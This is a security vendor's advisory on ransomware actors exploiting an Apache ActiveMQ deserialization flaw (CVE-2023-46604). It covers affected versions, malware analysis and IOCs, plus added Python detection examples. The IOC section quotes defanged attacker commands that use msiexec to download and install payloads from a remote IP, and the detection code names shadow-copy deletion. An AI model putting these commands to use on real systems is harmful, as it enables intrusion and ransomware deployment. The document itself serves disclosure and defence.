Last updated Friday, November 3, 2023, 18:32:32 GMT

Tom Elkins, John Fenninger, Evan McCann, Matthew Smith, and Micah Young contributed attacker behavior insights to this blog.

Beginning Friday, October 27, Rapid7 Managed Detection and Response (MDR) identified suspected exploitation of Apache ActiveMQ CVE-2023-46604 in two different customer environments. In both instances, the adversary attempted to deploy ransomware binaries on target systems in an effort to ransom the victim organizations. Based on the ransom notes and available evidence, we attribute the activity to the HelloKitty ransomware family, whose source code was leaked on a forum in early October. Rapid7 observed similar indicators of compromise across the affected customer environments, both of which were running outdated versions of Apache ActiveMQ.

CVE-2023-46604 is a remote code execution vulnerability in Apache ActiveMQ that allows a remote attacker with network access to a broker “to run arbitrary shell commands by manipulating serialized class types in the OpenWire protocol to cause the broker to instantiate any class on the classpath.” This is one of the more convoluted vulnerability descriptions we’ve seen, but the root cause of the issue is insecure deserialization.

Apache disclosed the vulnerability and released new versions of ActiveMQ on October 25, 2023. Proof-of-concept exploit code and vulnerability details are both publicly available. Rapid7’s vulnerability research team has tested the public PoC and confirmed that the behavior MDR observed in customer environments is similar to what we would expect from exploitation of CVE-2023-46604. Rapid7 Research has a technical analysis of the vulnerability in AttackerKB.

Affected Products

According to Apache’s advisory, CVE-2023-46604 affects the following:

  • Apache ActiveMQ 5.18.0 before 5.18.3
  • Apache ActiveMQ 5.17.0 before 5.17.6
  • Apache ActiveMQ 5.16.0 before 5.16.7
  • Apache ActiveMQ before 5.15.16
  • Apache ActiveMQ Legacy OpenWire Module 5.18.0 before 5.18.3
  • Apache ActiveMQ Legacy OpenWire Module 5.17.0 before 5.17.6
  • Apache ActiveMQ Legacy OpenWire Module 5.16.0 before 5.16.7
  • Apache ActiveMQ Legacy OpenWire Module 5.8.0 before 5.15.16
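The ranges above are easy to misread when triaging an inventory, so the following added example (not code from the Rapid7 post or from Apache) encodes them as a version check and also pulls the version out of an install path of the shape seen in the parent process; the install path used in the comments is an assumed layout, not a value taken from a real host.

```python
import re
from typing import Optional

# Affected ranges transcribed from the advisory list as (first affected, first fixed);
# None means no lower bound ("Apache ActiveMQ before 5.15.16"). The Legacy OpenWire
# Module branches share the same fixed versions, so the same table applies to them.
AFFECTED_RANGES = [
    ((5, 18, 0), (5, 18, 3)),
    ((5, 17, 0), (5, 17, 6)),
    ((5, 16, 0), (5, 16, 7)),
    (None,       (5, 15, 16)),
]

# Install directories are named apache-activemq-<version> (assumed layout)
INSTALL_DIR_RE = re.compile(r"apache-activemq-(\d+\.\d+\.\d+)", re.IGNORECASE)

def parse_version(version: str) -> tuple:
    """'5.15.3' (or '5.18.3-SNAPSHOT') -> (5, 15, 3); raises on anything else."""
    m = re.match(r"^(\d+)\.(\d+)\.(\d+)", version.strip())
    if not m:
        raise ValueError(f"unrecognised ActiveMQ version: {version!r}")
    return tuple(int(p) for p in m.groups())

def is_vulnerable(version: str) -> bool:
    """True when the version falls inside one of the advisory's affected ranges."""
    v = parse_version(version)
    for low, fixed in AFFECTED_RANGES:
        if (low is None or low <= v) and v < fixed:
            return True
    return False

def version_from_install_path(path: str) -> Optional[str]:
    """Pull the version out of a process path such as
    ...\\ActiveMQ\\apache-activemq-5.15.3\\bin\\win64\\java.exe, or None if absent."""
    m = INSTALL_DIR_RE.search(path)
    return m.group(1) if m else None
```

Feeding it the java.exe parent-process path from an EDR query gives a quick first pass over hosts before an authenticated scan confirms the build.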

Observed Attacker Behavior

In the case of successful exploitation, java.exe will contain the specific Apache application being targeted — in this case, D:\Program Files\ActiveMQ\apache-activemq-5.15.3\bin\win64, which was observed as the parent process in both incidents. Post-exploitation, the adversary attempted to load remote binaries named M2.png and M4.png using MSIExec. The threat actor’s attempts at ransomware deployment were somewhat clumsy: In one of the incidents Rapid7 observed, there were more than half a dozen unsuccessful attempts to encrypt assets.

HelloKitty Ransomware Details

Rapid7 obtained the MSI files M4.png and M2.png from the domain 172.245.16[.]125 and analyzed them in a controlled environment. After analysis, Rapid7 observed that both MSI files contained a 32-bit .NET executable internally named dllloader. Within the .NET executable dllloader, Rapid7 found that the executable loads a Base64-encoded payload. We decoded the Base64-encoded payload and determined that it was a 32-bit .NET DLL named EncDLL.

The EncDLL binary contained functionality similar to that of ransomware — the DLL searches for specific processes and stops them from running. Rapid7 observed that the DLL encrypts specific file extensions using the RSACryptoServiceProvider function, appending the extension .locked to encrypted files. We also observed another function that provided information about which directories to avoid encrypting, static variables assigned along with the ransomware note, and a function that attempted communication to an HTTP server, 172.245.16[.]125.

The ransomware note indicated communications should occur through the email address service@hellokittycat[.]online.

Indicators of Compromise

Rapid7’s vulnerability research team analyzed CVE-2023-46604 and available public exploit code. In our test setup, activemq.log had a single line entry for successful exploitation of CVE-2023-46604:

2023-10-31 05:04:58,736 | WARN  | Transport Connection to: tcp://192.168.86.35:15871 failed: java.net.SocketException: An established connection was aborted by the software in your host machine | org.apache.activemq.broker.TransportConnection.Transport | ActiveMQ Transport: tcp:///192.168.86.35:15871@61616

In the example above, the attacker’s (i.e., the researcher’s) IP is 192.168.86.35, and the target port is 61616. More or less information may be available depending on the logging settings, which can be modified.
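To make that entry usable at scale, here is an added example (not code from the Rapid7 post) that parses activemq.log in its default pipe-delimited layout, keeps the transport-failure WARN entries, and extracts the remote endpoint and the broker port they hit; the log lines it runs on are constructed for the example, with the exploitation entry modelled on the one above.

```python
import re
from typing import Optional

# Constructed sample of activemq.log: a normal INFO line, the WARN entry seen after
# exploitation (remote 192.168.86.35:15871 hitting the broker's port 61616),
# and a benign client disconnect that must not be flagged.
SAMPLE_LOG = """\
2023-10-31 05:03:10,001 | INFO  | Apache ActiveMQ 5.15.3 (localhost, ID:host-1) started | org.apache.activemq.broker.BrokerService | main
2023-10-31 05:04:58,736 | WARN  | Transport Connection to: tcp://192.168.86.35:15871 failed: java.net.SocketException: An established connection was aborted by the software in your host machine | org.apache.activemq.broker.TransportConnection.Transport | ActiveMQ Transport: tcp:///192.168.86.35:15871@61616
2023-10-31 05:05:01,120 | WARN  | Transport Connection to: tcp://10.0.0.7:50211 failed: java.io.EOFException | org.apache.activemq.broker.TransportConnection.Transport | ActiveMQ Transport: tcp:///10.0.0.7:50211@61616
"""

# Message field: "Transport Connection to: tcp://<ip>:<port> failed: <exception>[: <reason>]"
MSG_RE = re.compile(
    r"Transport Connection to: tcp://(?P<ip>[\d.]+):(?P<port>\d+) failed: "
    r"(?P<exception>[\w.$]+)(?:: (?P<reason>.*))?"
)
# Thread field ends with "tcp:///<ip>:<port>@<listen_port>"
THREAD_RE = re.compile(r"tcp:///[\d.]+:\d+@(?P<listen_port>\d+)")

def parse_transport_warning(line: str) -> Optional[dict]:
    """Parse one log line; None unless it is a WARN transport-failure entry."""
    # Default ActiveMQ layout: timestamp | level | message | logger | thread
    fields = [f.strip() for f in line.split(" | ")]
    if len(fields) < 5 or fields[1] != "WARN":
        return None
    m = MSG_RE.search(fields[2])
    if not m:
        return None
    t = THREAD_RE.search(fields[4])
    return {
        "timestamp": fields[0],
        "remote_ip": m["ip"],
        "remote_port": int(m["port"]),
        "exception": m["exception"],
        "reason": m["reason"],
        "listen_port": int(t["listen_port"]) if t else None,
    }

def suspicious_transport_events(log_text: str) -> list:
    """Entries whose connection was aborted with a java.net.SocketException, the
    trace the post saw after a successful exploit. Abrupt client disconnects can
    log the same line, so treat a hit as a lead to correlate with process data."""
    return [
        e for e in (parse_transport_warning(l) for l in log_text.splitlines())
        if e and e["exception"] == "java.net.SocketException"
    ]
```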

Other IOCs:

Files dropped and executed via msiexec command:

  • cmd.exe /c "start msiexec /q /i hxxp://172.245.16[.]125/m4.png"
  • cmd.exe /c "start msiexec /q /i hxxp://172.245.16[.]125/m2.png"
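The command lines above are the behavioral signal worth hunting for, independent of the specific host or file names. The following added example (not code from the Rapid7 post or Rapid7's detection rules) classifies process-creation events for that chain: cmd.exe spawned by ActiveMQ's java.exe, msiexec installing a package from an HTTP(S) URL, and shadow-copy deletion ahead of encryption. The events and field names are constructed, and the URL host is a TEST-NET placeholder rather than the indicator from the post.

```python
import re

# Constructed process-creation events (generic EDR-style fields), not real telemetry.
EVENTS = [
    {"image": r"C:\Windows\System32\cmd.exe",
     "parent_image": r"D:\Program Files\ActiveMQ\apache-activemq-5.15.3\bin\win64\java.exe",
     "command_line": 'cmd.exe /c "start msiexec /q /i http://192.0.2.10/m4.png"'},
    {"image": r"C:\Windows\System32\msiexec.exe",
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "command_line": "msiexec /q /i http://192.0.2.10/m4.png"},
    {"image": r"C:\Windows\System32\msiexec.exe",          # local install: benign
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": r'msiexec /i "C:\Users\admin\Downloads\tool.msi"'},
    {"image": r"C:\Windows\System32\vssadmin.exe",
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "command_line": "vssadmin delete shadows /all /quiet"},
]

# msiexec given a package URL instead of a local file (/i followed by http(s)://)
HTTP_INSTALL_RE = re.compile(r'\bmsiexec(?:\.exe)?\b.*\s/i\s+"?https?://', re.IGNORECASE)
# java.exe running out of an ActiveMQ install directory (assumed directory naming)
ACTIVEMQ_JAVA_RE = re.compile(r"apache-activemq-[\d.]+[\\/].*java\.exe$", re.IGNORECASE)
# shadow-copy deletion, a common precursor to encryption
VSS_DELETE_RE = re.compile(r"\bvssadmin(?:\.exe)?\s+delete\s+shadows\b", re.IGNORECASE)

def classify_event(event: dict) -> list:
    """Names of the detections one process event triggers; empty list if none."""
    cmd = event.get("command_line", "")
    image = event.get("image", "").lower()
    parent = event.get("parent_image", "")
    findings = []
    if image.endswith("cmd.exe") and ACTIVEMQ_JAVA_RE.search(parent):
        findings.append("ActiveMQ java.exe launching cmd.exe")
    if HTTP_INSTALL_RE.search(cmd):
        findings.append("msiexec installing package over HTTP")
    if VSS_DELETE_RE.search(cmd):
        findings.append("vssadmin deleting shadow copies")
    return findings

def triage(events: list) -> list:
    """(event index, findings) for every event that tripped at least one detection."""
    return [(i, f) for i, e in enumerate(events) if (f := classify_event(e))]
```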

The following file hashes were part of the two MSI packages downloaded from the domain 172.245.16[.]125:

  • M2.msi: 8177455ab89cc96f0c26bc42907da1a4f0b21fdc96a0cc96650843fd616551f4
  • M4.msi: 8c226e1f640b570a4a542078a7db59bb1f1a55cf143782d93514e3bd86dc07a0
  • dllloader: C3C0CF25D682E981C7CE1CC0A00FA2B8B46CCE2FA49ABE38BB412DA21DA99CB7
  • EncDll: 3E65437F910F1F4E93809B81C19942EF74AA250AE228CACA0B278FC523AD47C5

Mitigation Guidance

Organizations should update to a fixed version of ActiveMQ as soon as possible and look for indicators of compromise in their environments. Apache-supplied updates are available here. Apache also has information on improving the security of ActiveMQ implementations here.

Rapid7 Customers

Rapid7 MDR, InsightIDR, and Managed Threat Complete (MTC) customers have the following rules deployed and alerting on the post-exploitation activity related to this threat. Rapid7 recommends ensuring the Insight Agent is deployed to all applicable assets within our customers’ environments:

  • Suspicious Process - Apache ActiveMQ Launching CMD Process
  • Attacker Technique - MSIExec Loading Object Via HTTP
  • Suspicious Process - Volume Shadow Service Delete Shadow Copies

InsightVM and Nexpose customers can assess their exposure to CVE-2023-46604 with an authenticated vulnerability check for Windows available in the November 1 content release.

Updates

November 2, 2023: Updated to reflect availability of InsightVM content and to correct IOC typos (a missing character in the hash for EncDll, and an erroneous character removed from one of the file names).